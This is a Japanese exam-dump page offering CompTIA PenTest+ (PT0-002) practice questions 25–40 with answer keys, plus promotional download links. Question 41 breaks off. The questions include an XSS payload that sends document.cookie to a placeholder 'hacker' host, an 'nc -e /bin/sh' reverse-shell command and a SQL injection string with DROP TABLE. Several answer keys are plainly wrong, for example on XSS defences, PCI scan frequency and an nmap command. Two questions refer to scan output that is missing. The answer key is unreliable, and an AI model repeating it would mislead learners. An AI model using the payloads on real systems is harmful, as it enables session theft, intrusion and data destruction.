[2022年更新]早速ゲットしてトップランクのCompTIA PT0-002試験問題集 [Q25-Q41]

Share

[2022年更新]早速ゲットしてトップランクのCompTIA PT0-002試験問題集

パスする秘訣はPT0-002をゲットして認証された試験エンジンPDF

質問 25
A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings.
Which of the following is most important for the penetration tester to define FIRST?

  • A. Establish the method of potential false positives.
  • B. Establish the format required by the client.
  • C. Establish the threshold of risk to escalate to the client immediately.
  • D. Establish the preferred day of the week for reporting.

正解: B

 

質問 26
Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)

  • A. The libraries may be unsupported
  • B. The libraries may be vulnerable
  • C. The provenance of code is unknown
  • D. The libraries' code bases could be read by anyone
  • E. The licensing of software is ambiguous
  • F. The libraries may break the application

正解: B,D

 

質問 27
A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

  • A. Empire
  • B. OWASPZAP
  • C. ProxyChains
  • D. Nessus

正解: C

 

質問 28
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

  • A. Session tokens
  • B. Parameterized queries
  • C. Input validation
  • D. Web-application firewall
  • E. Output encoding
  • F. Base64 encoding

正解: A,B

 

質問 29
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

  • A. Obtain /etc/shadow and brute force the root password.
  • B. Run the nc -e /bin/sh <...> command.
  • C. Move laterally to create a user account on LDAP
  • D. Create a one-shot systemd service to establish a reverse shell.

正解: D

解説:
Explanation
https://hosakacorp.net/p/systemd-user.html

 

質問 30
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?

  • A. Perform jamming on all 2.4GHz and 5GHz channels.
  • B. Set the malicious AP to broadcast within dynamic frequency selection channels.
  • C. Modify the malicious AP configuration to not use a pre-shared key.
  • D. Send deauthentication frames to the stations.

正解: B

 

質問 31
A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?

  • A. RCPT TO and VRFY
  • B. EXPN and TURN
  • C. VRFY and TURN
  • D. VRFY and EXPN

正解: D

 

質問 32
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
* Have a full TCP connection
* Send a "hello" payload
* Walt for a response
* Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?

  • A. Employ an OpenVAS simple scan against the TCP port of the host.
  • B. Run nmap -Pn -sV -script vuln <IP address>.
  • C. Perform a credentialed scan with Nessus.
  • D. Create a script in the Lua language and use it with NSE.

正解: D

 

質問 33
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?

  • A. Call law enforcement officials immediately
  • B. Collect the proper evidence and add to the final report
  • C. Reach out to the primary point of contact
  • D. Try to take down the attackers

正解: C

 

質問 34
A penetration tester conducted an assessment on a web server. The logs from this session show the following:
http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ' ; DROP TABLE SERVICES; -- Which of the following attacks is being attempted?

  • A. Cookie hijacking
  • B. Parameter pollution
  • C. Clickjacking
  • D. Cross-site scripting
  • E. Session hijacking

正解: B

 

質問 35
A penetration tester conducted a discovery scan that generated the following:

Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?

  • A. nmap -o 192.168.0.1-254, cut -f 2
  • B. nmap -oG list.txt 192.168.0.1-254 , sort
  • C. nmap -sn 192.168.0.1-254 , grep "Nmap scan" | awk '{print S5}'
  • D. nmap --open 192.168.0.1-254, uniq

正解: A

 

質問 36
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.
Which of the following Nmap scan syntaxes would BEST accomplish this objective?

  • A. nmap -sV 192.168.1.2/24 -PO
  • B. nmap -sT -vvv -O 192.168.1.2/24 -PO
  • C. nmap -sS -O 192.168.1.2/24 -T1
  • D. nmap -sA -v -O 192.168.1.2/24

正解: C

 

質問 37
A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?

  • A. Semicolon
  • B. Comma
  • C. Double dash
  • D. Single quote

正解: D

 

質問 38
A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

  • A. Quarterly
  • B. Annually
  • C. Weekly
  • D. Monthly

正解: C

 

質問 39
Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?

  • A. Password encryption
  • B. Sessions and cookies
  • C. Public and private keys
  • D. HTTPS communication

正解: B

 

質問 40
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important dat a. Which of the following was captured by the testing team?

  • A. User hashes sent over SMB
  • B. Multiple handshakes
  • C. Encrypted file transfers
  • D. IP addresses

正解: A

 

質問 41
......

PT0-002試験問題は練習は2022年最新の142問題:https://www.goshiken.com/CompTIA/PT0-002-mondaishu.html

PT0-002試験問題集パスと最新テスト問題集:https://drive.google.com/open?id=1DPaJ7JtaMgcHIQq0772pDt7PLCtzojWy